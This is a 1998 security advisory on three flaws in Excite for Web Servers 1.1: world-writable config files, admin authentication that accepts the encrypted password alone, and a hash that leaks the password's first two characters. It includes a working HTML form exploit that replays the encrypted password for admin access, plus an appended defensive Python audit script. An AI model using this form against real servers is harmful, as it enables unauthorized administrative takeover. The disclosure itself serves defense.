EWS (Excite for Web Servers) 1.1 security compromises.
8 Dec. 1998
Summary
EWS (Excite for Web Servers) version 1.1, a product by Excite that allows Web administrators to add "Smart Search" capabilities to their home pages, was found to contain several security vulnerabilities.
EWS 1.1 by Excite was found to contain the following security vulnerabilities:
1) The installation program installs several files with world writeable permissions.
2) All authentication after the initial access to AT-admin.cgi relies solely on the encrypted password.
3) Passwords are not encrypted properly.
A detailed description of each of the mentioned vulnerabilities follows:
1) The installation program installs several files with world writeable permissions.
This is bad because one of them (Architext.conf) contains the encrypted password that is used for all authentication. Because of this, any user with shell or non-anonymous FTP access to the web server could modify the encrypted password.
2) All authentication after the initial access to AT-admin.cgi relies solely on the encrypted password.
Since any user with shell or FTP access can read Architext.conf, it is trivial for local users to gain administrative privileges over EWS. A malicious user only needs a web page that looks like this:
<html>
<head><title>exploit</title></head>
<body>
<p><FORM ACTION="http://EWS.SERVER.COM/cgi-bin/AT-generate.cgi" METHOD=POST>
<INPUT TYPE="hidden" NAME="db" VALUE="personal">
<INPUT TYPE="submit" NAME="Reload" VALUE="Reload">
Reload this page, in case the log file or status has changed.
<INPUT TYPE="hidden" NAME="Dump" VALUE="dummy">
<INPUT TYPE="hidden" NAME="File" VALUE="/usr/local/etc/excite/collections/AT-personal.prog">
<INPUT TYPE="hidden" NAME="Type" VALUE="progress">
<INPUT TYPE="hidden" NAME="ENCRYPTEDPASS" VALUE="ENCRYPTEDPASS">
</FORM><BR>
</body>
</html>
Of course you should replace EWS.SERVER.COM and ENCRYPTEDPASS with values that make sense for your situation, but that isn't a big problem. Now all you have to do is access this page and click on the button, and you get to a menu that behaves exactly as if you knew the unencrypted password.
3) Passwords are not encrypted properly.
Note that the first two characters of the encrypted password are always the first two characters of the plain-text password. For example, if you choose the password "blah", the encrypted password is "blk1x.w.ISlDw".
In light of the fact that the plain-text password is not needed for administrative control (above), this problem is not that significant. However, since this same password may be used in other places, it should be protected better. If a dictionary attack on the password is done, only those words that start with "bl" need be examined; if a brute-force attack is used, the number of guesses goes down significantly.
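The following Python script is an added example written from the administrator's side; it is not part of the original advisory or of Excite's product. It audits an install tree for the world-writable files of issue 1 and checks a stored hash for the prefix leak of issue 3, using the "blah" / "blk1x.w.ISlDw" pair quoted above. The directory layout and the short wordlist are constructed for the demonstration.

```python
# Added example (not EWS code): audit checks for issues 1 and 3 of the advisory.
import os
import stat
import tempfile

# Constructed wordlist; three of eight entries share the leaked prefix "bl".
SAMPLE_WORDLIST = ["apple", "blah", "black", "blue", "bread", "excite", "search", "zebra"]


def world_writable_files(root):
    """Return every regular file under root that any user can modify (issue 1)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.stat(path).st_mode & stat.S_IWOTH:
                hits.append(path)
    return sorted(hits)


def hash_leaks_prefix(password, stored_hash):
    """True when the stored hash begins with the password's first two characters (issue 3)."""
    return len(stored_hash) >= 2 and stored_hash[:2] == password[:2]


def dictionary_fraction_remaining(stored_hash, wordlist):
    """Fraction of a wordlist still worth testing once the two-character prefix is known."""
    prefix = stored_hash[:2]
    matching = sum(1 for word in wordlist if word.startswith(prefix))
    return matching / len(wordlist)


def demo():
    """Build a constructed EWS-like tree, run both checks and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        conf = os.path.join(root, "Architext.conf")          # config holding the hash
        cgi = os.path.join(root, "cgi-bin", "AT-admin.cgi")  # admin script (not writable)
        os.makedirs(os.path.dirname(cgi))
        for path, mode in ((conf, 0o666), (cgi, 0o755)):     # 0o666 = world writable
            with open(path, "w") as handle:
                handle.write("placeholder\n")
            os.chmod(path, mode)
        return {
            "world_writable": [os.path.relpath(p, root) for p in world_writable_files(root)],
            "prefix_leak": hash_leaks_prefix("blah", "blk1x.w.ISlDw"),
            "dictionary_fraction": dictionary_fraction_remaining("blk1x.w.ISlDw", SAMPLE_WORDLIST),
        }


if __name__ == "__main__":
    print(demo())
```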